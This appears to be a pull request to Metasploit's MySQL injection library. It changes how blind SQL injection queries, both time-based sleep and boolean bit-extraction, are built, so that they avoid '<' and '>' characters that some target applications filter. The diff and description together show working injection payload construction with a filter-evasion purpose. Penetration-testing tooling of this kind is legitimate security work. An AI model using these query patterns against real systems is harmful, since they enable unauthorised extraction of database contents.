### PR TITLE
[MySQL injection library] Avoid the use of '<>'

### DIFF
--- a/lib/msf/core/exploit/sqli/mysqli/common.rb
+++ b/lib/msf/core/exploit/sqli/mysqli/common.rb
@@ -277,17 +277,23 @@ module Msf::Exploit::SQLi::MySQLi
     def blind_detect_length(query, timebased)
       if_function = ''
       sleep_part = ''
+      reversed_sleep_part = ''
       if timebased
         if_function = 'if(' + if_function
-        sleep_part += ",sleep(#{datastore['SqliDelay']}),0)"
+        sleep_part += ",0,sleep(#{datastore['SqliDelay']}))"
+        reversed_sleep_part = ",sleep(#{datastore['SqliDelay']}),0)"
       end
       i = 0
       output_length = 0
       loop do
-        output_bit = blind_request("#{if_function}length(cast((#{query}) as binary))&#{1 << i}<>0#{sleep_part}")
+        output_bit = blind_request("#{if_function}length(cast((#{query}) as binary))&#{1 << i}=0#{sleep_part}")
+        # if it's timebased, it will sleep if the bit is 1
+        # otherwise, it will return true if the bit is 0
+        output_bit = !output_bit unless timebased
         output_length |= (1 << i) if output_bit
         i += 1
-        stop = blind_request("#{if_function}floor(length(cast((#{query}) as binary))/#{1 << i})=0#{sleep_part}")
+        stop = blind_request("#{if_function}floor(length(cast((#{query}) as binary))/#{1 << i})=0#{reversed_sleep_part}")
+        stop = !stop unless timebased
         break if stop
       end
       output_length
@@ -307,13 +313,14 @@ module Msf::Exploit::SQLi::MySQLi
       sleep_part = ''
       if timebased
         if_function = 'if(' + if_function
-        sleep_part += ",sleep(#{datastore['SqliDelay']}),0)"
+        sleep_part += ",0,sleep(#{datastore['SqliDelay']}))"
       end
       output = length.times.map do |j|
         current_character = known_bits
         bits_to_guess.times do |k|
           # the query below: the inner substr returns a character from the result, the outer returns a bit of it
-          output_bit = blind_request("#{if_function}ascii(mid(cast((#{query}) as binary), #{j + 1}, 1))&#{1 << k}<>0#{sleep_part}")
+          output_bit = blind_request("#{if_function}ascii(mid(cast((#{query}) as binary), #{j + 1}, 1))&#{1 << k}=0#{sleep_part}")
+          output_bit = !output_bit unless timebased
           current_character |= (1 << k) if output_bit
         end
         current_character.chr

--- a/lib/msf/core/exploit/sqli/mysqli/common.rb
+++ b/lib/msf/core/exploit/sqli/mysqli/common.rb
@@ -277,23 +277,17 @@ module Msf::Exploit::SQLi::MySQLi
     def blind_detect_length(query, timebased)
       if_function = ''
       sleep_part = ''
-      reversed_sleep_part = ''
       if timebased
         if_function = 'if(' + if_function
-        sleep_part += ",0,sleep(#{datastore['SqliDelay']}))"
-        reversed_sleep_part = ",sleep(#{datastore['SqliDelay']}),0)"
+        sleep_part += ",sleep(#{datastore['SqliDelay']}),0)"
       end
       i = 0
       output_length = 0
       loop do
-        output_bit = blind_request("#{if_function}length(cast((#{query}) as binary))&#{1 << i}=0#{sleep_part}")
-        # if it's timebased, it will sleep if the bit is 1
-        # otherwise, it will return true if the bit is 0
-        output_bit = !output_bit unless timebased
+        output_bit = !blind_request("#{if_function}length(cast((#{query}) as binary))&#{1 << i}=0#{sleep_part}")
         output_length |= (1 << i) if output_bit
         i += 1
-        stop = blind_request("#{if_function}floor(length(cast((#{query}) as binary))/#{1 << i})=0#{reversed_sleep_part}")
-        stop = !stop unless timebased
+        stop = blind_request("#{if_function}floor(length(cast((#{query}) as binary))/#{1 << i})=0#{sleep_part}")
         break if stop
       end
       output_length
@@ -313,14 +307,13 @@ module Msf::Exploit::SQLi::MySQLi
       sleep_part = ''
       if timebased
         if_function = 'if(' + if_function
-        sleep_part += ",0,sleep(#{datastore['SqliDelay']}))"
+        sleep_part += ",sleep(#{datastore['SqliDelay']}),0)"
       end
       output = length.times.map do |j|
         current_character = known_bits
         bits_to_guess.times do |k|
           # the query below: the inner substr returns a character from the result, the outer returns a bit of it
-          output_bit = blind_request("#{if_function}ascii(mid(cast((#{query}) as binary), #{j + 1}, 1))&#{1 << k}=0#{sleep_part}")
-          output_bit = !output_bit unless timebased
+          output_bit = !blind_request("#{if_function}ascii(mid(cast((#{query}) as binary), #{j + 1}, 1))&#{1 << k}=0#{sleep_part}")
           current_character |= (1 << k) if output_bit
         end
         current_character.chr


### PR DESCRIPTION
## Before this pull-request

- MySQL Time-based blind injection queries: `if(DATA_BIT<>0,sleep(delay),0)`
  Bit is 1 if the query takes more than delay to run. 0 otherwise.
- MySQL Boolean-based blind injection queries: `DATA_BIT<>0`
  The bit is the exact outcome of the condition.

## After this pull-request


- MySQL Time-based blind injection queries: `if(DATA_BIT=0,sleep(delay),0)`
  Bit is 0 if the query takes more than delay to run. 1 otherwise.
- MySQL Boolean-based blind injection queries: `DATA_BIT=0`
  The bit is the inverse of the condition, if `DATA_BIT=0` is true, the bit is 0, it's 1 otherwise.

The output bit is `!blind_request(...)` in this case.
 
## Why this change?

This avoids the use of the characters '<>' in queries. Different applications handle data differently, While investigating a recent SQL injection vulnerability (#16131 ), I noticed that queries don't run when they include '<' or '>'.

Makes #16131 work.